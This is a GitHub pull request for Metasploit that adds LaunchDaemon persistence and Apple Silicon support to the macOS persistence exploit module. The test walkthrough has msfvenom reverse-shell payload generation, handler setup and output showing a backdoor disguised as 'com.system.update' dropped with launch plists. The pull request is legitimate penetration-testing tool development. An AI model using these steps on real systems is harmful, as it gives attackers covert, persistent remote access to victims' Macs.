Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add LaunchDaemon Persistence to exploits/osx/local/persistence.rb #19360

Merged
merged 8 commits into from
Oct 25, 2024

Conversation

gardnerapp
Copy link
Contributor

@gardnerapp gardnerapp commented Aug 2, 2024

According to The Art of Mac Malware Launch Items are able to persist as LaunchAgents or LaunchDaemons, this pull request adds LaunchDaemon persistence to exploits/osx/local/persistence.rb by writing a plist file to ~/Library/LaunchDaemons. One of the advantages of persisting as a LaunchDaemon is that they run before user login and with elevated permissions. Additionally this pull request adds the ability for the module to target Apple Silicon devices.

As part of the testing I used BlockBlock to catch the plist entry being written. Note if you're using something like LuLu it needs to be turned off as it will catch and terminate meterpreter/shell connections.

I've tested both LaunchAgent and LaunchDaemon persistence with this module on an Apple Silicon device.
$ uname -a Darwin corey.local 23.1.0 Darwin Kernel Version 23.1.0: Mon Oct 9 21:28:12 PDT 2023; root:xnu-10002.41.9~6/RELEASE_ARM64_T8103 arm64

We start by generating a meterpreter:

$ ../metasploit-framework/msfvenom -p osx/aarch64/meterpreter_reverse_tcp  LHOST=192.168.0.239 LPORT=4444 -o payload -f macho
[-] No platform was selected, choosing Msf::Module::Platform::OSX from the payload
[-] No arch selected, selecting arch: aarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 813091 bytes
Final size of macho file: 813091 bytes
Saved as: payload

Start a listener and reload the module:

msf6> reload_all
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.239
lhost => 192.168.0.239
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload osx/aarch64/meterpreter/reverse_tcp
payload => osx/aarch64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

Run the meterpreter -> 10:48:22 ~/Desktop $ chmod +x payload && ./payload

background the session and start to configure the options for persistence.rb

meterpreter> bg
msf6 exploit(multi/handler) > search osx persistence

msf6 exploit(multi/handler) > use 0
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/local/persistence) > set target 3
target => 3
msf6 exploit(osx/local/persistence) > set session 2
session => 2
msf6 exploit(osx/local/persistence) > set payload osx/aarch64/meterpreter_reverse_tcp 
payload => osx/aarch64/meterpreter_reverse_tcp
msf6 exploit(osx/local/persistence) > set lhost 192.168.0.239
lhost => 192.168.0.239
smsf6 exploit(osx/local/persistence) > set lport 1234
lport => 1234

Test w LaunchAgent, note that exploit doesn't technically "complete" because RUN_NOW is false. The plist entry and executable are dropped on the system though as shown by the pictures below.

msf6 exploit(osx/local/persistence) > run
[*] Started reverse TCP handler on 192.168.0.239:1234 
[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/corery/Library/.vRzmesOZ/com.system.update
[+] LaunchAgent added: /Users/corery/Library/LaunchAgents/com.system.update.plist
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/corery/Library/.vRzmesOZ ; rm /Users/corery/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

[*] Exploit completed, but no session was created.

Screenshot 2024-08-02 at 12 13 57 PM Screenshot 2024-08-02 at 12 14 06 PM Screenshot 2024-08-02 at 12 12 43 PM

Now we test LaunchDaemons by setting `LaunchItem':

msf6 exploit(osx/local/persistence) > set LAUNCH_ITEM LaunchDaemon
LAUNCH_ITEM => LaunchDaemon
msf6 exploit(osx/local/persistence) > run

[*] Started reverse TCP handler on 192.168.0.239:1234 
[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/corery/Library/.hsKpBATL/com.system.update
[+] LaunchAgent added: /Users/corery/Library/LaunchDaemons/com.system.update.plist
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/corery/Library/.hsKpBATL ; rm /Users/corery/Library/LaunchDaemons/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

[*] Exploit completed, but no session was created.
Screenshot 2024-08-02 at 12 18 19 PM Screenshot 2024-08-02 at 12 17 17 PM

@gardnerapp gardnerapp changed the title Osx daemon privesc Add LaunchDaemon Persistence to exploits/osx/local/persistence.rb Aug 2, 2024
@dwelch-r7 dwelch-r7 added the needs-linting The module needs additional work to pass our automated linting rules label Aug 6, 2024
Copy link

github-actions bot commented Aug 6, 2024

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

},
'License' => MSF_LICENSE,
'Author' => [ "Marcin 'Icewall' Noga <marcin[at]icewall.pl>", 'joev' ],
'Targets' => [
[ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
[ 'Mac OS X x86 (Native Payload for 10.14 and earlier)', { 'Arch' => ARCH_X86, 'Platform' => [ 'osx' ] } ],
['Mac OS X Apple Sillicon', {'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
['Mac OS X Apple Sillicon', {'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],
['Mac OS X Apple Silicon', {'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],

modules/exploits/osx/local/persistence.rb Outdated Show resolved Hide resolved
@adfoster-r7
Copy link
Contributor

Release notes

Adds a new LAUNCH_ITEM option to the exploits/osx/local/persistence module. The allowed values are LaunchAgent or LaunchDaemon. One of the advantages of persisting as a LaunchDaemon is that they run before user login and with elevated permissions. Additionally this pull request adds the ability for the module to target Apple Silicon devices.

@adfoster-r7 adfoster-r7 merged commit 6e1ea92 into rapid7:master Oct 25, 2024
37 checks passed
@adfoster-r7
Copy link
Contributor

Super cool, thanks!

@adfoster-r7 adfoster-r7 added rn-payload-enhancement release notes for enhanced payloads and removed needs-linting The module needs additional work to pass our automated linting rules labels Oct 25, 2024
@adfoster-r7 adfoster-r7 added rn-enhancement release notes enhancement and removed rn-payload-enhancement release notes for enhanced payloads labels Nov 15, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
rn-enhancement release notes enhancement
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants